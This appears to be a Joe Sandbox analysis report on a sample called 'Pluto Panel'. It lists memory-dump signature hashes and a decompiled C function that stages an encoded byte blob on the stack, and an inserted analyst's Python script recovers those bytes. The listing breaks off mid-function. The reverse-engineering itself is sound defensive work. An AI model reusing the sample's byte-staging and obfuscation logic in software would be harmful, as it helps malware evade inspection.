                                                                                                          • API ID:
                                                                                                          • String ID: :@!q$:@!q
                                                                                                          • API String ID: 0-2918136011
                                                                                                          • Opcode ID: 81decd9b36c8673977ed0f063312426d77353787c9bdd0bad2720ea5251d49a0
                                                                                                          • Instruction ID: 79dd28688f30442fe009b8ee6f9e0b8d8d900a74667b50684797c778ea372d46
                                                                                                          • Opcode Fuzzy Hash: 81decd9b36c8673977ed0f063312426d77353787c9bdd0bad2720ea5251d49a0
                                                                                                          • Instruction Fuzzy Hash: B102E134A02229DFDB69EF64C854B9DB7B7EF4A300F1081E9990867365CB395E81DF21
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6ff3cf565662bf98f64008e28be2639b333750a92fbf5605f1a1a23db0bde12c
                                                                                                          • Instruction ID: b9a7582e984e65c5ea5b4cd315722b04b4f0d7c5600a5e3a2631a78a92be9f2d
                                                                                                          • Opcode Fuzzy Hash: 6ff3cf565662bf98f64008e28be2639b333750a92fbf5605f1a1a23db0bde12c
                                                                                                          • Instruction Fuzzy Hash: DC41F370D01219CFDB54DFA9C894BEEBBF2FB49300F1495AAC409A7290EB745A84CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 53f1252654ad4fc619c205a752e0a140c4ec6efd4f3c3c3597f36d3eeb8a9253
                                                                                                          • Instruction ID: 52327ece96e2423d137df0c80b1a613315168a595b9a539a0930eaea669593b9
                                                                                                          • Opcode Fuzzy Hash: 53f1252654ad4fc619c205a752e0a140c4ec6efd4f3c3c3597f36d3eeb8a9253
                                                                                                          • Instruction Fuzzy Hash: FB310570E012199FDB08DFA8D850AEEBBB2EB89300F10456AD414B7390DB746E46CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dc3ddb2f54e9f2eb1c7c9032be8f2f902febcb6b1357a651c845350fe3b2e203
                                                                                                          • Instruction ID: 666494e195807418999d897ee97890a888436555b3342ce3d8d9123148d8f7a1
                                                                                                          • Opcode Fuzzy Hash: dc3ddb2f54e9f2eb1c7c9032be8f2f902febcb6b1357a651c845350fe3b2e203
                                                                                                          • Instruction Fuzzy Hash: 1C310270E012199FDB08DFA8D850AEEBBF2EB88300F10852AD514B7390DB756E42CF95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a74e9c2b9d72f36d1f4c8af4334d67641e2956236ecf385dc778bb6a185280fd
                                                                                                          • Instruction ID: bad3e207a741101a9b5379e8a2608b635a19c0d0d496b6caf9ef1cb71b1687b4
                                                                                                          • Opcode Fuzzy Hash: a74e9c2b9d72f36d1f4c8af4334d67641e2956236ecf385dc778bb6a185280fd
                                                                                                          • Instruction Fuzzy Hash: 9A21057490120ADFCB04EFA8C944BEEBBB2BF45301F1485A9D404B73A5DB349B85DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7749348a1aa2f541cb687cffdcd86d5bf59d6e5fa4be45c39c776cd439a586a8
                                                                                                          • Instruction ID: c3b7e1f31b438025e2b33de8713a6b407c0f3b555cc861e883e4c49ed84842ef
                                                                                                          • Opcode Fuzzy Hash: 7749348a1aa2f541cb687cffdcd86d5bf59d6e5fa4be45c39c776cd439a586a8
                                                                                                          • Instruction Fuzzy Hash: 1121F33490120ADFCB04EFA8C444AEEB7B2BF45301F2485A9D40577395DB74AA84DBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a6958b139d1236fdd99acff4026695819e00b27f9d733f6771ed970e4f3d6c56
                                                                                                          • Instruction ID: 6d78668c29cdc67cd70855f925780fe738f0e462067ce9f08824597ded621992
                                                                                                          • Opcode Fuzzy Hash: a6958b139d1236fdd99acff4026695819e00b27f9d733f6771ed970e4f3d6c56
                                                                                                          • Instruction Fuzzy Hash: 6721F274E09219DFDB00EFA0D9587EEBBF0AB09300F2085A9D501B7291D7789A88CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b38762de321b614179584bee045247e6964e96efc6fd717f38e30e0f0022af1b
                                                                                                          • Instruction ID: 30ef363cb475f1aa3df9374749add8e8df39418837b9346b36630be9bc777f67
                                                                                                          • Opcode Fuzzy Hash: b38762de321b614179584bee045247e6964e96efc6fd717f38e30e0f0022af1b
                                                                                                          • Instruction Fuzzy Hash: E2D05B35E592188ACB60EF54E8445FDF3B0EB47214F1131D2D55CB3122DB31DE988E15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f06e45582b58af10ad791ba334579a571d100a3f92f98b2df9eef72d36bed15b
                                                                                                          • Instruction ID: 52e9748d454b2ca04531ab7e6568a552e9ba1608269dc53c4dec79a799ab93f2
                                                                                                          • Opcode Fuzzy Hash: f06e45582b58af10ad791ba334579a571d100a3f92f98b2df9eef72d36bed15b
                                                                                                          • Instruction Fuzzy Hash: E7D0EC35E295188BCB24EF54EC405FCF374FB46215F012492E509A3121D7328A884A55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a48a44bc784b880bcedfbd07b6445703d3fc8ea1243b4b49f1088b6f247ac1de
                                                                                                          • Instruction ID: c6d40a79faf534dbebededa4b69e266cc70f60cd1135fa6000bfc6c673423a50
                                                                                                          • Opcode Fuzzy Hash: a48a44bc784b880bcedfbd07b6445703d3fc8ea1243b4b49f1088b6f247ac1de
                                                                                                          • Instruction Fuzzy Hash: A3D01275E2A0188BCB60EF94F8405FCF7B4EB46214F1170D2D50DB7251D731AB844E55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 08d668e0a5e85df04b884305b9675efb977a524052507e2d738640c1de9d5496
                                                                                                          • Instruction ID: 940201f53b8828fba810ba1be495ef2d3a93258e5e283aab80308a7db0ec1086
                                                                                                          • Opcode Fuzzy Hash: 08d668e0a5e85df04b884305b9675efb977a524052507e2d738640c1de9d5496
                                                                                                          • Instruction Fuzzy Hash: 3BD0E235E591198BCB20EFA4EA406ECF3B0EB46214F1120A3D609B7141D6308A588B24
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction ID: 1288d7e1c4a6f83d682a3586f0e2e5bb18e103b0ae555f566e4bbb3823f47889
                                                                                                          • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction Fuzzy Hash: 58B09236E540089AEB008EC8B4413FCF770E782229F106063C218B3591827586A84A89
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction ID: 8cfb8913528362ff856790899a0e5885f9b72a6247fca082299eb2110a95fbf0
                                                                                                          • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction Fuzzy Hash: C1B0923EE140089ADB008EC4B4413FCF7B4E786229F102063C218B3551837192A84689
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction ID: 984d52549c8fe561f2a306d4c9fa8175a4cf4af02cd195cb9384885e810b830a
                                                                                                          • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                                          • Instruction Fuzzy Hash: 66B0923AE140089ADB008EC4B4813FCF770E782229F142163C219B3552827592A84689
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

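The E00F1B1E6 listing that follows compares a string taken from its arguments against four constants and, in the branch taken when the fourth call returns 0, fills a run of single-byte stack locals (`_v280 = 0x1d; _v279 = 0xac; ...`) one byte at a time. That is the shape of an embedded blob or stack string being assembled at run time; the page does not show what the bytes decode to, so the example below stops at recovering them in memory order. The script is an added analyst helper, not Joe Sandbox tooling and not code from the sample. It assumes the IDA/Joe Sandbox convention that `_vN` is the byte at ebp-N (so the lowest address is the largest N), that every `_vN` in the run is one byte wide (the decompiler types `_v231` as a pointer, but it sits between one-byte slots and is assigned `_t184`, which the enclosing `if` pins to 0), and it embeds only the assignments visible on this page; the real listing continues past `_v209`.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed excerpt of the decompiled E00F1B1E6 listing on this page: the
# stack stores in the `_t184 == 0` branch. Only the visible portion is included.
LISTING = (
    "_v24 = _t184; _v16 = _t184; _v20 = _t184; "
    "_v280 = 0x1d; _v279 = 0xac; _v278 = 0xa8; _v277 = 0xf8; _v276 = 0xd3; _v275 = 0xb8; "
    "_v274 = 0x48; _v273 = 0x3e; _v272 = 0x48; _v271 = 0x7d; _v270 = 0x3e; _v269 = 0xa; "
    "_v268 = 0x62; _v267 = 7; _v266 = 0xdd; _v265 = 0x26; _v264 = 0xe6; _v263 = 0x67; "
    "_v262 = 0x81; _v261 = 3; _v260 = 0xe7; _v259 = 0xb2; _v258 = 0x13; _v257 = 0xa5; "
    "_v256 = 0xb0; _v255 = 0x79; _v254 = 0xee; _v253 = 0x4f; _v252 = 0xf; _v251 = 0x41; "
    "_v250 = 0x15; _v249 = 0xed; _v248 = 0x7b; _v247 = 0x14; _v246 = 0x8c; _v245 = 0xe5; "
    "_v244 = 0x4b; _v243 = 0x46; _v242 = 0xd; _v241 = 0xc1; _v240 = 0x8e; _v239 = 0xfe; "
    "_v238 = 0xd6; _v237 = 0xe7; _v236 = 0x27; _v235 = 0x75; _v234 = 6; _v233 = 0x8b; "
    "_v232 = 0x49; _v231 = _t184; _v230 = 0xdc; _v229 = 0xf; _v228 = 0x30; _v227 = 0xa0; "
    "_v226 = 0x9e; _v225 = 0xfd; _v224 = 9; _v223 = 0x85; _v222 = 0xf1; _v221 = 0xc8; "
    "_v220 = 0xaa; _v219 = 0x75; _v218 = 0xc1; _v217 = 8; _v216 = 5; _v215 = 0x79; "
    "_v214 = 1; _v213 = 0xe2; _v212 = 0x97; _v211 = 0xd8; _v210 = 0xaf; _v209 = 0x80;"
)

# One decompiler store: `_vN = <rhs>;` where rhs is a hex/decimal literal or a symbol.
STMT_RE = re.compile(r"_v(\d+)\s*=\s*([^;]+);")


def parse_stack_stores(listing: str, known: Optional[Dict[str, int]] = None
                       ) -> Tuple[Dict[int, int], List[int]]:
    """Map frame offset N -> byte for every `_vN = value;` in the listing.
    `known` resolves symbolic right-hand sides the control flow pins down
    (here `_t184` is 0 inside the branch); anything else is reported as
    unresolved rather than guessed."""
    known = known or {}
    stores: Dict[int, int] = {}
    unresolved: List[int] = []
    for m in STMT_RE.finditer(listing):
        offset, rhs = int(m.group(1)), m.group(2).strip()
        if rhs in known:
            value = known[rhs]
        else:
            try:
                value = int(rhs, 0)          # accepts 0x1d as well as plain 7
            except ValueError:
                unresolved.append(offset)
                continue
        stores[offset] = value & 0xFF
    return stores, unresolved


def candidate_blobs(stores: Dict[int, int], min_len: int = 8) -> List[Tuple[int, int]]:
    """Maximal runs of consecutive offsets, as (lowest N, highest N).
    Short runs (isolated pointer-sized locals such as _v16/_v20/_v24) are dropped."""
    runs: List[Tuple[int, int]] = []
    start = prev = None
    for n in sorted(stores):
        if prev is not None and n == prev + 1:
            prev = n
            continue
        if start is not None and prev - start + 1 >= min_len:
            runs.append((start, prev))
        start = prev = n
    if start is not None and prev - start + 1 >= min_len:
        runs.append((start, prev))
    return runs


def recover_buffer(stores: Dict[int, int], lo: int, hi: int) -> Tuple[bytes, List[int]]:
    """Lay the run out in address order: _vhi is ebp-hi (lowest address), so the
    first byte of the buffer is the store with the largest N. Gaps are zero-filled
    and reported so the analyst knows which bytes are not backed by a store."""
    out, missing = bytearray(), []
    for n in range(hi, lo - 1, -1):
        if n not in stores:
            missing.append(n)
        out.append(stores.get(n, 0))
    return bytes(out), missing


def printable_ratio(buf: bytes) -> float:
    """Share of bytes in the printable ASCII range; a low value says the blob is
    encoded or binary rather than a plaintext stack string."""
    return sum(0x20 <= b < 0x7F for b in buf) / len(buf) if buf else 0.0


if __name__ == "__main__":
    stores, unresolved = parse_stack_stores(LISTING, known={"_t184": 0})
    for lo, hi in candidate_blobs(stores):
        buf, missing = recover_buffer(stores, lo, hi)
        print(f"ebp-{hi} .. ebp-{lo}: {len(buf)} bytes, "
              f"printable {printable_ratio(buf):.0%}, gaps {missing}")
        print(buf.hex(" "))
```

Run on the excerpt this yields a single 72-byte run from ebp-280 to ebp-209 with no gaps and a low printable ratio, i.e. the function is staging encoded data rather than a readable string; to recover the whole blob, paste the rest of the stores from the continued listing into `LISTING` and re-run. Any store whose right-hand side is a symbol not covered by `known` is listed instead of silently zeroed, which is what you want when a register value is only known from a branch condition.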
                                                                                                          C-Code - Quality: 75%
                                                                                                          			E00F1B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                          				char* _v8;
                                                                                                          				char _v12;
                                                                                                          				signed char* _v16;
                                                                                                          				signed char* _v20;
                                                                                                          				signed char* _v24;
                                                                                                          				char _v152;
                                                                                                          				char _v153;
                                                                                                          				char _v154;
                                                                                                          				char _v155;
                                                                                                          				char _v156;
                                                                                                          				char _v157;
                                                                                                          				char _v158;
                                                                                                          				char _v159;
                                                                                                          				char _v160;
                                                                                                          				char _v161;
                                                                                                          				char _v162;
                                                                                                          				char _v163;
                                                                                                          				char _v164;
                                                                                                          				char _v165;
                                                                                                          				char _v166;
                                                                                                          				char _v167;
                                                                                                          				char _v168;
                                                                                                          				char _v169;
                                                                                                          				char _v170;
                                                                                                          				char _v171;
                                                                                                          				char _v172;
                                                                                                          				char _v173;
                                                                                                          				char _v174;
                                                                                                          				char _v175;
                                                                                                          				char _v176;
                                                                                                          				char _v177;
                                                                                                          				char _v178;
                                                                                                          				char _v179;
                                                                                                          				char _v180;
                                                                                                          				char _v181;
                                                                                                          				char _v182;
                                                                                                          				char _v183;
                                                                                                          				char _v184;
                                                                                                          				char _v185;
                                                                                                          				char _v186;
                                                                                                          				char _v187;
                                                                                                          				char _v188;
                                                                                                          				char _v189;
                                                                                                          				char _v190;
                                                                                                          				char _v191;
                                                                                                          				char _v192;
                                                                                                          				char _v193;
                                                                                                          				char _v194;
                                                                                                          				char _v195;
                                                                                                          				char _v196;
                                                                                                          				char _v197;
                                                                                                          				char _v198;
                                                                                                          				char _v199;
                                                                                                          				char _v200;
                                                                                                          				char _v201;
                                                                                                          				char _v202;
                                                                                                          				char _v203;
                                                                                                          				char _v204;
                                                                                                          				char _v205;
                                                                                                          				char _v206;
                                                                                                          				char _v207;
                                                                                                          				char _v208;
                                                                                                          				char _v209;
                                                                                                          				char _v210;
                                                                                                          				char _v211;
                                                                                                          				char _v212;
                                                                                                          				char _v213;
                                                                                                          				char _v214;
                                                                                                          				char _v215;
                                                                                                          				char _v216;
                                                                                                          				char _v217;
                                                                                                          				char _v218;
                                                                                                          				char _v219;
                                                                                                          				char _v220;
                                                                                                          				char _v221;
                                                                                                          				char _v222;
                                                                                                          				char _v223;
                                                                                                          				char _v224;
                                                                                                          				char _v225;
                                                                                                          				char _v226;
                                                                                                          				char _v227;
                                                                                                          				char _v228;
                                                                                                          				char _v229;
                                                                                                          				char _v230;
                                                                                                          				signed char* _v231;
                                                                                                          				char _v232;
                                                                                                          				char _v233;
                                                                                                          				char _v234;
                                                                                                          				char _v235;
                                                                                                          				char _v236;
                                                                                                          				char _v237;
                                                                                                          				char _v238;
                                                                                                          				char _v239;
                                                                                                          				char _v240;
                                                                                                          				char _v241;
                                                                                                          				char _v242;
                                                                                                          				char _v243;
                                                                                                          				char _v244;
                                                                                                          				char _v245;
                                                                                                          				char _v246;
                                                                                                          				char _v247;
                                                                                                          				char _v248;
                                                                                                          				char _v249;
                                                                                                          				char _v250;
                                                                                                          				char _v251;
                                                                                                          				char _v252;
                                                                                                          				char _v253;
                                                                                                          				char _v254;
                                                                                                          				char _v255;
                                                                                                          				char _v256;
                                                                                                          				char _v257;
                                                                                                          				char _v258;
                                                                                                          				char _v259;
                                                                                                          				char _v260;
                                                                                                          				char _v261;
                                                                                                          				char _v262;
                                                                                                          				char _v263;
                                                                                                          				char _v264;
                                                                                                          				char _v265;
                                                                                                          				char _v266;
                                                                                                          				char _v267;
                                                                                                          				char _v268;
                                                                                                          				char _v269;
                                                                                                          				char _v270;
                                                                                                          				char _v271;
                                                                                                          				char _v272;
                                                                                                          				char _v273;
                                                                                                          				char _v274;
                                                                                                          				char _v275;
                                                                                                          				char _v276;
                                                                                                          				char _v277;
                                                                                                          				char _v278;
                                                                                                          				char _v279;
                                                                                                          				char _v280;
                                                                                                          				signed char* _v284;
                                                                                                          				char _v288;
                                                                                                          				intOrPtr _v292;
                                                                                                          				intOrPtr _v296;
                                                                                                          				signed int _v300;
                                                                                                          				char _v320;
                                                                                                          				void _v348;
                                                                                                          				void* __ebx;
                                                                                                          				void* __edi;
                                                                                                          				void* _t178;
                                                                                                          				void* _t180;
                                                                                                          				void* _t182;
                                                                                                          				signed char* _t184;
                                                                                                          				intOrPtr _t219;
                                                                                                          				signed int _t231;
                                                                                                          				intOrPtr _t242;
                                                                                                          
                                                                                                          				_t242 = __ecx;
                                                                                                          				_push(0x44356c);
                                                                                                          				_v292 = __ecx;
                                                                                                          				_a4 = _a4 + 4;
                                                                                                          				_t178 = E00F2105D(_a4 + 4);
                                                                                                          				_push(_t178);
                                                                                                          				L00F5B581();
                                                                                                          				_t219 = _a8;
                                                                                                          				if(_t178 == 0) {
                                                                                                          					E00F21069(E00F2105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
                                                                                                          				}
                                                                                                          				_push(0x44357c);
                                                                                                          				_t180 = E00F2105D(_a4);
                                                                                                          				_push(_t180);
                                                                                                          				L00F5B581();
                                                                                                          				if(_t180 == 0) {
                                                                                                          					E00F21069(E00F2105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
                                                                                                          				}
                                                                                                          				_push(0x443588);
                                                                                                          				_t182 = E00F2105D(_a4);
                                                                                                          				_push(_t182);
                                                                                                          				L00F5B581();
                                                                                                          				if(_t182 == 0) {
                                                                                                          					E00F21069(E00F2105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
                                                                                                          				}
                                                                                                          				_push(0x443598);
                                                                                                          				_t184 = E00F2105D(_a4);
                                                                                                          				_push(_t184);
                                                                                                          				L00F5B581();
                                                                                                          				if(_t184 != 0) {
                                                                                                          					L13:
                                                                                                          					return _t184;
                                                                                                          				} else {
                                                                                                          					_v24 = _t184;
                                                                                                          					_v16 = _t184;
                                                                                                          					_v20 = _t184;
                                                                                                          					_v280 = 0x1d;
                                                                                                          					_v279 = 0xac;
                                                                                                          					_v278 = 0xa8;
                                                                                                          					_v277 = 0xf8;
                                                                                                          					_v276 = 0xd3;
                                                                                                          					_v275 = 0xb8;
                                                                                                          					_v274 = 0x48;
                                                                                                          					_v273 = 0x3e;
                                                                                                          					_v272 = 0x48;
                                                                                                          					_v271 = 0x7d;
                                                                                                          					_v270 = 0x3e;
                                                                                                          					_v269 = 0xa;
                                                                                                          					_v268 = 0x62;
                                                                                                          					_v267 = 7;
                                                                                                          					_v266 = 0xdd;
                                                                                                          					_v265 = 0x26;
                                                                                                          					_v264 = 0xe6;
                                                                                                          					_v263 = 0x67;
                                                                                                          					_v262 = 0x81;
                                                                                                          					_v261 = 3;
                                                                                                          					_v260 = 0xe7;
                                                                                                          					_v259 = 0xb2;
                                                                                                          					_v258 = 0x13;
                                                                                                          					_v257 = 0xa5;
                                                                                                          					_v256 = 0xb0;
                                                                                                          					_v255 = 0x79;
                                                                                                          					_v254 = 0xee;
                                                                                                          					_v253 = 0x4f;
                                                                                                          					_v252 = 0xf;
                                                                                                          					_v251 = 0x41;
                                                                                                          					_v250 = 0x15;
                                                                                                          					_v249 = 0xed;
                                                                                                          					_v248 = 0x7b;
                                                                                                          					_v247 = 0x14;
                                                                                                          					_v246 = 0x8c;
                                                                                                          					_v245 = 0xe5;
                                                                                                          					_v244 = 0x4b;
                                                                                                          					_v243 = 0x46;
                                                                                                          					_v242 = 0xd;
                                                                                                          					_v241 = 0xc1;
                                                                                                          					_v240 = 0x8e;
                                                                                                          					_v239 = 0xfe;
                                                                                                          					_v238 = 0xd6;
                                                                                                          					_v237 = 0xe7;
                                                                                                          					_v236 = 0x27;
                                                                                                          					_v235 = 0x75;
                                                                                                          					_v234 = 6;
                                                                                                          					_v233 = 0x8b;
                                                                                                          					_v232 = 0x49;
                                                                                                          					_v231 = _t184;
                                                                                                          					_v230 = 0xdc;
                                                                                                          					_v229 = 0xf;
                                                                                                          					_v228 = 0x30;
                                                                                                          					_v227 = 0xa0;
                                                                                                          					_v226 = 0x9e;
                                                                                                          					_v225 = 0xfd;
                                                                                                          					_v224 = 9;
                                                                                                          					_v223 = 0x85;
                                                                                                          					_v222 = 0xf1;
                                                                                                          					_v221 = 0xc8;
                                                                                                          					_v220 = 0xaa;
                                                                                                          					_v219 = 0x75;
                                                                                                          					_v218 = 0xc1;
                                                                                                          					_v217 = 8;
                                                                                                          					_v216 = 5;
                                                                                                          					_v215 = 0x79;
                                                                                                          					_v214 = 1;
                                                                                                          					_v213 = 0xe2;
                                                                                                          					_v212 = 0x97;
                                                                                                          					_v211 = 0xd8;
                                                                                                          					_v210 = 0xaf;
                                                                                                          					_v209 = 0x80;
                                                                                                          					_v208 = 0x38;
                                                                                                          					_v207 = 0x60;
                                                                                                          					_v206 = 0xb;
                                                                                                          					_v205 = 0x71;
                                                                                                          					_v204 = 0xe;
                                                                                                          					_v203 = 0x68;
                                                                                                          					_push(0x80);
                                                                                                          					_push(_t184);
                                                                                                          					_push( &_v152);
                                                                                                          					_v202 = 0x53;
                                                                                                          					_v201 = 0x77;
                                                                                                          					_v200 = 0x2f;
                                                                                                          					_v199 = 0xf;
                                                                                                          					_v198 = 0x61;
                                                                                                          					_v197 = 0xf6;
                                                                                                          					_v196 = 0x1d;
                                                                                                          					_v195 = 0x8e;
                                                                                                          					_v194 = 0x8f;
                                                                                                          					_v193 = 0x5c;
                                                                                                          					_v192 = 0xb2;
                                                                                                          					_v191 = 0x3d;
                                                                                                          					_v190 = 0x21;
                                                                                                          					_v189 = 0x74;
                                                                                                          					_v188 = 0x40;
                                                                                                          					_v187 = 0x4b;
                                                                                                          					_v186 = 0xb5;
                                                                                                          					_v185 = 6;
                                                                                                          					_v184 = 0x6e;
                                                                                                          					_v183 = 0xab;
                                                                                                          					_v182 = 0x7a;
                                                                                                          					_v181 = 0xbd;
                                                                                                          					_v180 = 0x8b;
                                                                                                          					_v179 = 0xa9;
                                                                                                          					_v178 = 0x7e;
                                                                                                          					_v177 = 0x32;
                                                                                                          					_v176 = 0x8f;
                                                                                                          					_v175 = 0x6e;
                                                                                                          					_v174 = 6;
                                                                                                          					_v173 = 0x24;
                                                                                                          					_v172 = 0xd9;
                                                                                                          					_v171 = 0x29;
                                                                                                          					_v170 = 0xa4;
                                                                                                          					_v169 = 0xa5;
                                                                                                          					_v168 = 0xbe;
                                                                                                          					_v167 = 0x26;
                                                                                                          					_v166 = 0x23;
                                                                                                          					_v165 = 0xfd;
                                                                                                          					_v164 = 0xee;
                                                                                                          					_v163 = 0xf1;
                                                                                                          					_v162 = 0x4c;
                                                                                                          					_v161 = 0xf;
                                                                                                          					_v160 = 0x74;
                                                                                                          					_v159 = 0x5e;
                                                                                                          					_v158 = 0x58;
                                                                                                          					_v157 = 0xfb;
                                                                                                          					_v156 = 0x91;
                                                                                                          					_v155 = 0x74;
                                                                                                          					_v154 = 0xef;
                                                                                                          					_v153 = 0x91;
                                                                                                          					L00F5B531();
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsd");
                                                                                                          					_t231 = 7;
                                                                                                          					_push(0x11);
                                                                                                          					asm("movsb");
                                                                                                          					_push( &_v320);
                                                                                                          					_push( &_v152);
                                                                                                          					memcpy( &_v348, 0x4435b8, _t231 << 2);
                                                                                                          					L00F5B575();
                                                                                                          					_v8 =  &_v280;
